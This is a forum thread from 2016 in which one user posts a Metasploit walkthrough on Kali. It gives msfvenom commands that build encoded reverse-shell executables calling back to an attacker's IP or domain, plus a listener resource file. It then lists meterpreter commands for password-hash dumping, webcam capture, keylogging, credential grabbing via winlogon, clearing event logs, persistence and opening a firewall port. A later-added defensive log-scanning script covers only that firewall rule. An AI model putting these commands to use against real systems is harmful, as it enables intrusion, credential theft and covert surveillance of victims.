MSF Reverse TCP Kali 2 Example


Post by jamied_uk on 20th August 2016, 21:29




Code:
#!/bin/bash
# Usage ./Start.sh
#
echo "Opening Listener... Type: msfconsole -r meterpreter.rc from another Terminal"
service apache2 start && service postgresql start && msfconsole -r meterpreter.rc

Create Code

Code:
#!/bin/bash
# Usage ./Create.sh "90.217.250.57"
# Usage ./Create.sh "jnet.sytes.net"
# jnet.sytes.net
#
service apache2 start && service postgresql start && msfconsole
echo "Ext Mode Start"
myvar="$@"
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST="$myvar" -b "\x00" -f exe -o /usr/FullSetup.exe

echo "Int Mode Start"
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=192.168.0.69 -b "\x00" -f exe -o /usr/Setup.exe

clear
echo "Opening Listener..."
msfconsole -r meterpreter.rc


(For external Networks use Ext IP For LHOST)


Code:
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.69 -b "\x00" -f exe -o /usr/Setup.exe


Last edited by jamied_uk on 25th August 2016, 13:14; edited 4 times in total
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk


Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:47

offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:53

offensive-security.com/metasploit-unleashed/msfvenom

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:58

Firewall Alias (for port forwarding rules)!

Code:
sudo apt-get install -y gufw



Code:
alias firewall='sudo gufw'

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 22:12

Shell Binding

Code:
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 22:18

More

(For Linux Binaries as well as Windows)


Code:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf






netsec.ws/?p=331

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 22:20

Now For Creating The Listener

Code:
touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.0.69 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc

Now to run

Code:
msfconsole -r meterpreter.rc




Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 23:11

Code Update Link
app.box.com/s/ul2khq3x7d1uoym480b39fzk0qxuiy2r

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 23:29

Connect to a session


Code:
sessions -i 1


Last edited by jamied_uk on 21st August 2016, 12:58; edited 1 time in total

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 11:49

Test Notes & Video (Part 2)




Grab the Test Notes.txt file from link above,

The reason 10 failed after attempt 2 was a line for the listener not being used on Kali, but the second test on Windows 10 works fine!

I tried initially with Win 10, disabled the Defender, and then after Windows 7 was successful I tried Win 10 again (after that missing line was used) and it worked, and 2 sessions were seen on the Kali side.

Mission Success! More vids to come, so make sure to subscribe and also be part of the video and help with research to be featured on my YouTube channel (you will get credit and a recommendation to sub your channel if you have one; for more info message me on here or reply).


Update Link For Notes
app.box.com/s/ul2khq3x7d1uoym480b39fzk0qxuiy2r


Vid (Extra) Coming Soon!

You need to migrate, so to find what PID Explorer.exe is using, do the following command:


Code:
ps


Last edited by jamied_uk on 21st August 2016, 12:52; edited 3 times in total

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 12:14



Extra Extra More More More


Keep an eye out for more vids, subscribe for more


youtube.com/channel/UCpi2AA868yHOSyvN-FejDjg


Last edited by jamied_uk on 21st August 2016, 13:55; edited 1 time in total

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 12:17

Commands for inside msf>

Get username
Code:
getuid


Code:
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >



Get a Shell (Shell Access)

Code:
shell




Migrate To Full Access Mode Persistence

Code:
run post/windows/manage/migrate 260   (where 260 is pid of explorer.exe)

List processes

Code:
ps

Search for file (at least 3 examples)

Code:
search


Code:
search -f autoexec.bat


Code:
search -f sea*.bat c:\\xamp\\





Code:
getuid



Get hash dump of their SAM

Code:
hashdump

Check Idle Time

Code:
idletime

Their ipconfig


Code:
ipconfig


Webcam

Code:
webcam_list

Code:
webcam_snap


Code:
webcam_snap -h

Code:
webcam_snap -i 1 -v false

Desktop Screenshot
Code:
meterpreter > migrate 260
[*] Migrating to 260...
[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screengrab
Screenshot saved to: /root/nYdRUppb.jpeg
meterpreter >













File Upload

Code:
upload




Clear Logs

Code:
clearev





Exec a file remotely
Code:
execute -f cmd.exe -i -H



For Help in the meantime

offensive-security.com/metasploit-unleashed/meterpreter-basics
offensive-security.com/metasploit-unleashed/screen-capture
offensive-security.com/metasploit-unleashed/persistent-backdoors


Last edited by jamied_uk on 21st August 2016, 16:26; edited 1 time in total

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 15:24

Firewall Rules

Code:
netsh advfirewall firewall add rule name="Open Port 4444" dir=in action=allow protocol=TCP localport=4444
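Added example, not part of the original posts: the rule in the post above opens an inbound port with netsh, and a defender can spot that kind of change in process command-line logs. The script below scans a constructed, pipe-separated log (time|host|user|command line, an assumed export format) and reports every netsh command that adds an inbound allow rule; the function name, hosts and users are made up for illustration.

```shell
#!/bin/bash
# Added example: flag process command lines that open an inbound Windows
# Firewall port with netsh, like the rule in the post above.
# SAMPLE_LOG is constructed for this example; the pipe-separated layout
# (time|host|user|command line) is an assumption, not a real product format.

SAMPLE_LOG='2016-08-21T15:20:01|WS-07|alice|netsh advfirewall firewall show rule name=all
2016-08-21T15:24:10|WS-07|alice|netsh advfirewall firewall add rule name="Open Port 4444" dir=in action=allow protocol=TCP localport=4444
2016-08-21T15:25:42|WS-09|bob|netsh advfirewall firewall add rule name="Block Telnet" dir=in action=block protocol=TCP localport=23
2016-08-21T15:31:05|WS-11|carol|NETSH.EXE AdvFirewall Firewall Add Rule name=x localport=8443 action=allow dir=in protocol=TCP'

# Print "time host user port" for every inbound allow rule added via netsh.
# Matching is case-insensitive and does not depend on argument order.
find_inbound_allow_rules() {
  awk -F'|' '
    {
      cmd = tolower($4)
      # Only "netsh advfirewall firewall add rule" invocations are of interest.
      if (cmd !~ /netsh(\.exe)?[ \t]+advfirewall[ \t]+firewall[ \t]+add[ \t]+rule/) next
      # Skip outbound rules and block rules.
      if (cmd !~ /dir=in/ || cmd !~ /action=allow/) next
      port = "any"                      # no localport= means all ports
      if (match(cmd, /localport=[^ \t]+/))
        port = substr(cmd, RSTART + 10, RLENGTH - 10)   # 10 = length of "localport="
      print $1, $2, $3, port
    }'
}

printf '%s\n' "$SAMPLE_LOG" | find_inbound_allow_rules
```

On the sample it reports the WS-07 rule for port 4444 and the WS-11 rule for port 8443, and ignores the `show` and `action=block` lines.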

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 08:51

Keylogger Key Logging MSF




Code:
exploit



check which PID (explorer.exe)

Code:
ps


Migrate to that pid number for explorer.exe (number will be different)

Code:
migrate 768

Start keylogging

Code:
keyscan_start


Now dump the key logs


Code:
keyscan_dump


Migrate to winlogon process to gain login credentials

401 winlogon.exe C:\WINNT\system32\winlogon.exe

(use ps to find the PID for that process).



offensive-security.com/metasploit-unleashed/keylogging

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 11:18

Using Domain Instead Of A Static IP


Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 13:27

After restarting a target the session will end. To make it persistent, you will need to add a startup option so that it can reconnect after a restart!

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 23:06

MSF For Linux Mint

Metasploit for Mint





Metasploit For Linux Mint

Code:



curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && sudo chmod 755 msfinstall && ./msfinstall









Code:
#!/bin/bash
# Usage: ./msf.sh
#
msfconsole








More On...

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
